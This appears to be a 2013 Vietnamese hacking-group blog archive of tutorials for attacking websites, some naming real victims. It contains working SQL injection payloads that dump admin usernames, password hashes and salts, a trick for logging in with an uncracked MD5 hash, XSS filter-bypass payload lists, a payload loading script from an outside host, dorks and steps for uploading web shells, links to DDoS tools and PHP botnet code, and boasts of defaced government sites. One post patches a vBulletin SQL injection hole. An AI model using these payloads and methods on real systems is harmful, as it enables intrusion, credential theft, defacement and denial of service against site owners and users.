Thứ Ba, 18 tháng 6, 2013

Chủ Nhật, 28 tháng 4, 2013

Cảnh báo về virus facebook đang hoành hành

- Trong đợt này thường xuyên có vài người inbox gởi đến 1 cái link : http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg

- Ex :

- Nhìn có vẻ là .jpg nhưng người làm ra con này sử dụng kỹ thuật extension thay đổi đuôi của file .

- Sau khi tải về tôi thử chạy nó và kết quả thì thấy ở facebook tôi đã tự động gởi 1 nội dung : "http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg" đến những người đã từng inbox với tôi

- Một hồi phân tích thì thằng làm ra con này cũng không phải tay vừa :D . Chả ai nghĩ 16kb của nó lại tạo ra được 1 file 67kb đâu :))

################################################## ######
# hầu như chỉ có vài AV phát hiện được . Tôi thử avira nhưng kết quả là không tìm thấy !
* Kết quả : http://chk4me.com/check/public/NTXx1...6ZF_M398DSOC1l
################################################## ######

################################################## ######
# Folder infection : C:\Documents and Settings\[User]\Application Data\ , Auto Startup
# File name : svchosts.exe, nig78.tmp.bat
################################################## ######

Cái ruột :





Tut By Midz

Thứ Năm, 18 tháng 4, 2013

Scan Victim bằng Metasploit

Mình đã viết một bài về Metasploit framwork rồi.
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau )
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.

Step1: Vào msfconsole ,rồi type db_nmap
root@bt:~# msfconsole
msf > db_nmap
[*] Usage: db_nmap [nmap options]


Nhận đc thông báo nmap_option --> ta có thể sử dụng các option của nmap thông thường.
Thử scan victim nào đó nhé.Hộm nó mới có con shell trên honda67.com mấy mem up lên huynhdegroup.net.Hôm nay vào tên nào đã deface rồi.Nên lấy nó test luôn.

Ip của honda67.com là 112.78.2.15
msf > db_nmap 112.78.2.15
 



Clip Metasploit by Trongkhang



Link Video Clip:

Vui lòng click vào các hình ảnh bên dưới



Fix bug SQLI Mod vB4 Gift Music


Bug này đã có exploit và bị khai thác triệt để nhưng vẫn chưa có ai đưa ra bản vá cho nó, hôm nay rảnh được chút thời gian nên mình làm cái tut cho oai chứ thật ra là đọc code và fix lỗi cho nó thôi kakaka.

cách fix bug này:

vào: Admincp -> Plugin & product option -> Plugin manage -> [HQTH]Music Gift -> [HQTH]Music Gift có hook misc_start -> edit (sửa) -> tìm dòng code dưới:


if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX  
."hqth_music WHERE id = $_GET[id] AND pulish = 1");
Thay thế bằng dòng:


if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX  
."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1");
/*fixed by ccb*/
Mod này mình thấy có nhiều bản được tùy biến lại nhưng vẫn dính lỗi và cách fix tương tự chỉ việc để ý chút xíu chỗ câu query và fix cho đúng cái Prefix của nó là được.

vd:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = $_GET[id] AND pulish = 1");
thì thay bằng:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1");

nguồn: concobe - VHB - huynhdegroup.net

Tut by Concobe

SQLI Mod vB4 Gift Music

################################################## ####
# SQLI Mods vB4 Gift Music

# Google Dork: dork là misc.php?do=music_full&id=

# Exploit Author: GhostVN
################################################## ####

Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null

http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -


Tut by GhostVN_VHB

Metasploit framework



           Mình đã xem trên mạng.Tài liệu về Metasploit Framework tiếng việt khá ít.Và không đầy đủ.Nên mình viết lại những gì mình biết ,tham khảo thêm một số nguồn tiếng anh [ Mục đích là để giúp newbie biết rõ hơn ,và để làm tài liệu chính thức từ vhb,Không phải lấy từ nguồn khác.Có một bài kakavn_85 leech về vhb rồi.Nhưng bài đó khá sơ sài ,nên mình viết lại bài này].Hiện tại còn một số phần chưa hoàn thành.Anh em nào am hiểu về các module encoders module và Nops module trong metasploit framework thì pm yahoo mình icarus_ken.Để cùng mình biên soạn kĩ hơn về 2 phần này.

-Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác,Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode ,hàng ngàn exploit của các hệ điều hành,các chương trình hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các Exploit...Nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ.

-Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn (pentesting ) nhưng đối với những attacker như chúng ta,thì nó thực sự là một công cụ vô cùng hữu ích ( dùng để kiểm tra ,khai thác lỗi ,exploit ).Thực sự theo mình nghĩ thì ai muốn làm hacker (hay script kidie đi chăng nữa ) thì cũng nên bỏ thời gian ra nghiên cứu kĩ về nó.

-Nói sơ qua Metasploit framework là một phần nhỏ của dự án Metaspoit ( đc xây dựng từ ngôn ngữ perl sau đó đc viết lại bằng ruby.Đúng ra là chủ yếu bằng ruby).
Bộ metasploit framwork hỗ trợ giao diện cho nguời dùng dưới nhiều dạng


  • -Console interface : Dùng lệnh msfconsole .Đa số thao tác bằng dòng lệnh.
  • -GUI -armitage : Dùng Armitage để vào.Đây là giao diện đồ họa.
  • -Command line interface : dùng lệnh msfcli để vào

Một số Tool DDOS



-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr

- Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5

-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj

-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82

-LOIC http://www.mediafire.com/?79b5xqa10ddcnro

-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr

-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5

-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd

-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v

-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn

-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x

-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc

-Unicorn Booter (Download Link Available Soon)

-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8


Tut by Vohinh95

Bug Topx vBB


Rảnh rỗi làm cái TUT này. Hi vọng giúp ích được cho các NewBie như mình của VHB.

Link Download:



END TUT!



Tut by KyoBin

Video Clip Hack Server FPT Telecom

Chào anh VHB, tối qua trongkhang98 mới làm video clip về Hacking attack WebServer FPT, post lên cho anh em tham khảo!

Nếu thấy hay thì thanks tinh thần ủng hộ VHB. Trong Tut có dùng tools "Crack Mật Khẩu thần chưởng" của X-T và mong Soliel sẽ post bài bên blog!


                  



                   

Click vào hình ảnh trên nhé

Trong Video có rất nhiều CSDL, anh em nào cần có thể xem xét qua, nhưng tuyệt đối không nên gây ảnh hưởng đến sự hoạt động của hệ thống nhé! Cảm ơn VHB Family!


Tut By Trongkhang98

Code Botnet PhP version beta

/**************************
* BOTNET VERSION BETA *
* CODE BY VNDRAGON - VHB *
* *
**************************/

Lúc trưa lên VHB ngồi đọc cái 2pic phần tích Tools DDOS gì đó, ngồi lên cái ý tưởng tại sao ta lại không phát triển botnet qua con đường php nhỉ.
Lên được ý tưởng mất buổi chiều để vọc cho ra cái version beta này. Code chỉ mang tính chất minh họa cho ý tưởng của mình, bạn nào có hứng thú thì pmm yh binhkiendb hợp tác phát triển tiếp nghen. Hoan nghên mọi sự hợp tác của các bạn.

Pass unrar: vndragon.vhb

link: http://www.mediafire.com/?cxg5g1b465dv6ln

---------- Post added at 07:22 PM ---------- Previous post was at 07:19 PM ----------

Up cái demo:



 


Tut By:

Code send mail nặc danh

Rảnh rổi viết cái này cho anh em dùng cho vui, sẳn xài cái tools mã hóa của pác Leo share, mình mã hóa file lại tại vì mún mọi người có ai dùng thì nhớ công mình ấy mà ^^.

demo :

---- Cách sử dụng: down file về rùi up lên host nào đó rùi chạy, lưu ý vì ở đây có xài hàm mail nên anh em chọn host nào thì chọn đừng chọn host dis hàm mail rồi bảo sao không thấy gì nha !

---- Phần nội dung gửi anh em xài code html cho ok nhé, để cho đoạn nội dung xuống dòng khuyên nên dùng thẻ <p>Nội dung</p> thay vì dùng "Nội dung </br>".

link down:http://www.mediafire.com/?1dpvh544z6795m7

pass:eagle

Tut by Eagle

Thứ Năm, 4 tháng 4, 2013

Man in the middle Attack



            Phương pháp tấn công đc hình dung qua chính cái tên gọi của nó.Là một phương pháp cơ bản và làm nền tảng chung cho nhiều kĩ thuật tấn công.Ở đây attacker đóng vai trò là người trung gian,đứng giữa,giả mạo trong phiên làm việc giữa victim và một máy chủ nào đó.Mọi gói tin xuất phát từ victim đến máy chủ hay ngược lại đề đi qua máy attacker ,nếu đc attacker forward .
Xem mô hình dưới đây:




Ta thấy attacker đã chèn vào giữa phiên giao dịch của victim và máy chủ.Vậy làm sao attacker làm đc điều này.Và các công cụ sniffer dùng phương pháp MITM như thế nào.
Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.

Thứ Ba, 2 tháng 4, 2013

Cảnh báo dansodaklak.gov.vn



http://dansodaklak.gov.vn/vhb.txt

Website đã bị tấn công, có thể can thiệp vào souce và cơ sở dữ liệu.

Cảnh báo tandbinhphuoc.gov.vn



http://tandbinhphuoc.gov.vn/vhb.txt

Website đã bị tấn công, có thể can thiệp vào souce và cơ sở dữ liệu.

Sử dụng Backtrack để sniffer

http://www.mediafire.com/?yfrek6bdbzisdnh

Pass download: XT_VHB

Tut By X-T

[ Local Attack ] Video Local SV Win


http://www.mediafire.com/?xbnwn046v6rvy0p


Pass download: XT_VHB

Tut By: X-T

[ SQLI ] Bypass bằng phương pháp Enable Post data



Tut by: CallBoyBLF

Cách login khi không decode đc md5 đối với 1 số site

Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá

1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.

Yêu cầu:

+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự

2. Trước tiên là tìm User,Pass:

http://traanh.vn/?frame=product_deta...m%20tbl_user--


1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.

Thay vì bỏ, thì còn phương án sau.

3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):

http://traanh.vn/admin/

4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.

Đến đây có lẽ vấn đề đã được giải quyết:

+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)

Video:
 
Video hướng dẫn


Tut by: Leorius

[ SQLI ] Magic convert

Victim: http://nchla.org/

Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.

Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz

Pass mediafire và winrar: vhb

[ SQLI ] SQLI site TQ

Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli

Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb

Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection

P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.

Tut by: S019ua

[ SQLI ] Error base

http://www.mediafire.com/?lqp7cmd25g93123

pass: vhb

Tut by: Bạch Cốt Tinh

[ Exploit ] Inferno vBShout SQLI 0day <= 2.5.2

Vào coi exploit-db.com có cái này hay nên làm lun cái tut cho anh em coi.

Đầu tiên vào google.vn search dork sau :


Code:
inurl:infernoshout.php?do=options&area=commands
Ra được 1 nùi site. Mình chọn site này làm Victim :

 http://www.cinemekan.com/infernoshout.php?do=options&area=commands




Ô Command Input nhập :

' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,

password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x 

from information_schema.tables group by x)a) AND ''='#
Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings


Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .


Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.

tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ

Tut By X-T

[ SQLI ] khai thác SQL với Javascript

Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay

file javascript


các bác tải về để sẵn khi nào dùng , lỡ em nó die

đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Video TUT

[ SQLI ]Seach SQL bằng Soft





Tut By: Ongtrum_vhb


[ SQLI ] Up Shell trên Admin Cp



http://www.youtube.com/watch?feature=player_embedded&v=mp3OaoMcDS0


Tut By:   Ongtrum_vhb

[ Check XSS ] tuoitre.vn



Check XSS tuoitre.vn

[ Check XSS ] baokim.vn



Check XSS baokim.vn

Thực hành hacking trên WebGoat

Hi a e trong VHB, mình thấy mọi người trong VHB rất có hứng thú với Hacking. Hôm nay mình sẽ giới thiệu cho a e về WebGoat - 1 trang web a e có thể thực hành hack với những lỗi phổ biến nhất XSS, SQL
và cũng sẽ có những hướng dẫn chi tiết nhất cho các bạn về lỗi đó và hướng giải quyết cho a e
Ai biết rồi thì thôi nhé, ko quăng gạch đá kẻo vỡ đầu >"<
Ở đây mình đã include hết các thứ rồi, các bạn chỉ cần đem về giải nén rồi ném folder xampp vào ở C hay D gì cũng được để vào cho dễ nhé

Link downoad:
http://www.mediafire.com/?4um44qlgki17efi
http://www.mediafire.com/?1bawsz253izt4s4
Pass: vhb_zaizaiqa


Tut By: zaizaiqa

[ LFI ] Up shell bằng phương pháp LFI




http://www.mediafire.com/?x64br4bxe4194t7

pass: vhb_zaizaiqa


Tut By: Zaizaiqa

[ LFI ]tổng hợp 1 số TUT về LFI


Sql thì không cần phải bàn cãi, nó xuất hiện quá nhiều và mọi người thường xuyên sử dụng nó để khai thác lỗi, ngoài sql ra vẫn còn nhiều lỗi khá thông dụng, trong đó có lỗi LFI mà a e ta có chiều hướng bỏ qua chọn sql cho đỡ lằng nhằng, sau đây là 1 số TUT mà mình đã tổng hợp qua nhiều nguồn và chọn lọc các TUT hay và ý nghĩa, hy vọng qua đó a e có thể có 1 cái nhìn khác về lỗi LFI này



Pass download: w0lf


Tut by:  w0lf





[ XSS ] Tut XSS Mp3.zing.vn

http://www.mediafire.com/?e5kooae23jyyiiz
Pass: vnhack

Demo Online: http://tinyurl.com/8h5wvmm

Tutorial tấn công Cross Site Scripting.

Victim: Mp3.zing.vn

Mô tả: Bypass filter đơn giản + kết hợp event trong HTML để thực thi script.

P/S: qua TUT này có thể phát triển để tấn công phishing hoặc social engineering hacking nếu biết vận dụng.

TUT này đã làm tut ảnh rồi, mà giờ làm lại video cho dể hiểu cách view source bypass filter với vận dụng chút kiến thức HTML căn bản thôi .

Enjoy it.

[ Check XSS ] vtv9.com.vn


Chi tiết: Check XSS vtv9.com.vn

[ Check XSS ] me.zing.vn


[Ebook] XSS attack and Defense

Link Download

http://www.mediafire.com/?5ktpvb68dvq1xvi

By: Kakavn_85

Thứ Hai, 1 tháng 4, 2013

Kho Video Học Hacking


 Tổng hợp các kho video hacking chủ yếu là SQLI, Upshell và Local Attack từ trước đến nay


http://up.4share.vn/d/5e6f6b686a6e6768




http://up.4share.vn/d/2312141610121412







http://www.mediafire.com/?pm55krbicizbc 

Một Số Diễn Đàn Hacking Và UG

I - TRong Nước:

I.1 - 4rum Hacking:

http://forums.vniss.net/index.php
http://www.hvaonline.net/hvaonline/forums/list.hva
http://ceh.vn/
http://xgrvn.net/
http://beyeugroup.net/BYG/
http://vhbgroup.net/
http://hcegroup.us
http://hkv.cc/HKV/index.php 
http://hvh.vn/
http://botnetvietnam.com/UG/forum.php
http://vietmatrix.net
http://mumauden.net
http://hacker.yakuza112.org/679-Diendancrack.html
http://hacker.yakuza112.org/339-Reaonline.html
http://www.vhcteam.net
http://www.diendancrack.com/
http://diendancracker.com/
http://idhteam.forum-pro.org/

I.2 - Blog Hacking

http://ducdung08clc.blogspot.com/
http://junookyo.blogspot.com
http://home.huydiet.vn/
http://ughabi.blogspot.com/
http://mkhahero.blogspot.com
http://kmasecurity.blogspot.com
http://rootbiez.blogspot.com/'
http://kechocgianvn.blogspot.com
http://satthuo.blogspot.com/
http://dark.ctu.vn
http://lehieuit.blogspot.com/
http://www.tmt-today.com/
http://ah7z.blogspot.com/
http://www.tamhon.net/
http://vinakid.blogspot.com/
http://www.haixinh.com/
 



I.3 -  UG:

http://www.localvn.biz/4all/
http://groupug.us/@/
http://vnhack.us/
http://vnw.cc/forum/
http://dfno1.com/df/
http://nbteam.us/@/index.php
http://hkv.cc/HKV/
http://lamviec12h.blogspot.com

Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ. 
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêtk

Tài liệu này được viết bởi cutynhangheo   - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 –  Tấn công và bảo vệ hệ thống

Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 –  Elite Collection HVA

Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...
4 –  Ghi Nhớ Ubuntu

Ebook ghi nhớ  các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.

1 số Ebook khác:
  -          Ebook Group HCE - Hacking + Crack = Enjoin
  -          Ebook Group BYG – BeYeuGroup
  -          CEH version tiêng việt
  -          The Web Application Hacker’s Handbook
  -          Hacker Web Exploitation
  -          CEH V.7 - Certified Ethical Hacker
  -          CHFI  - Computer Hacking Forensic Investigator
http://www.mediafire.com/?4kwnoo0jji5p95v              

Tất cả các password download là: soleil_vhb 



Vì mới comeback nên soleil cũng chưa tổng hợp được đầy đủ tất cả các tài liệu hay  trên giới hacking, tuy nhiên topic này sẽ được cập nhật thường xuyên ^^

Chủ Nhật, 31 tháng 3, 2013

IIS - Exploit



IIS Hacking là kỹ thuật hack website dễ nhất bằng cách upload shell lên hệ thống website. Hiện nay người dùng chủ yếu sử dụng hệ điều hành win 7, Vì vậy soleil sẽ chỉ demo IIS hacking trên win 7.


Bước 1: Vào My Computer, click chuột phải và chọn Add a network Location



Chọn Next



DNN - DotNet Nuke


Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN

:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 

Bước 2: Chọn  1 victim bất kỳ, ví dụ:


Bước 3: Thay thế đoạn url sau:

/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Lúc đó, đường link của victim như sau:

Thông tin thu được:



Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&amp;t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn



[ Up Shell ]Up Shell Voi NuKeViet





Bước 1: Đăng nhập với quyền quản trị  

 





[ Up Shell ] Kỹ Thuật Upshell Đối Với Joomla P.II



Bài trước soleil đã đề cập cách thức upload shell đối với joomla qua thư mục upload ảnh.
 http://ducdung08clc.blogspot.com/2012/02/ky-thuat-upshell-oi-voi-joomla.html

  Tuy nhiên một số site bị cấm quyền upload hoặc bị chặn bởi file .htacess làm cho shell không chạy được hay  một số lý do nào khác.

Trong tut này soleil sẽ demo phương pháp upload shell bằng cách edit 1 file trong themes của joomla rồi thay thế bằng code shell.


Bước 1: Login với quyền admintrator:

username: admin       pass: soleil

Bước 2: Vào phần quản lý giao diện


Vào tap “Phần Mở Rộng”     =>   “Quản lý giao diện”.
Hoặc vào theo path mặc định của joomla:  administrator/index.php?option=com_templates


[ Up Shell ] Kỹ Thuật Upshell Đối Với Joomla P.I







Bước 1: Loggin với quyền admin:

admin / soleil




Bước 2: Thiết lập định dạng file cho phép upload

 Chọn  “Cấu hình chung” / “ Hệ thống” /“Cấu hình phương tiện”

[ Up Shell ] Bug Dork Upload Shell

B1. Sử dụng dork sau vào google

allinurl:"index.php?Act=Merchants"

B2. Chọn 1 victim bất kỳ

http://www.vhmnetwork.com/index.php?Act=Merchants

B3. Thay đường path trên thành:

http://www.vhmnetwork.com/admin/backupstart.php




[ Up Shell ] Up Shell Via phpMyAdmin

Bước 1: Tìm Path của document root

 + Thông thường vào link http://www.victim.com/xampp/  đê xem document root

Ví dụ: http://www.ehtpe.co.cu/xampp/



+ Vào Php infor() để xem path document root : C:/xampp/htdocs  

[ Up Shell ]Up shell đối với WordPress


Bước 1: Loggin vào với quyền admin


admin / 123456

Bước 2: vào plugins theo path:


[ XSS ] Kỹ thuật Bypass và phương pháp tấn công XSS

                       

               Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS

     7.       Kỹ Thuật Bypass

                1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:


       "><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
     <ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

           Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

       Ví dụ:

    -          Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn    đoạn mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
      Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.



[ XSS] Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi




               Trong bài thứ nhất Giới Thiệu Chung Về XSS Soleil đã giới thiệu những nội dung chính sẽ viết, Ở bài thứ 2 này soleil sẽ giải thích rõ về XSS, phương pháp check site dính XSS và 1 số thao thác khi thực hiện tấn công theo phương thức XSS.

1-      XSS là gì ?

       XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.


 
2-      Nguyên lý hoạt động XSS

       Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker


3-      Phân loại XSS

XSS Có 2 dạng, đó là:

    +     Persistent 
+     Non-Persistent type


4-      Mức độ nguy hiểm XSS

   + Ăn cắp cookies, mật khẩu, cướp session làm việc
   + Cài các loại virus, trojan, backdoor trên máy tính victim
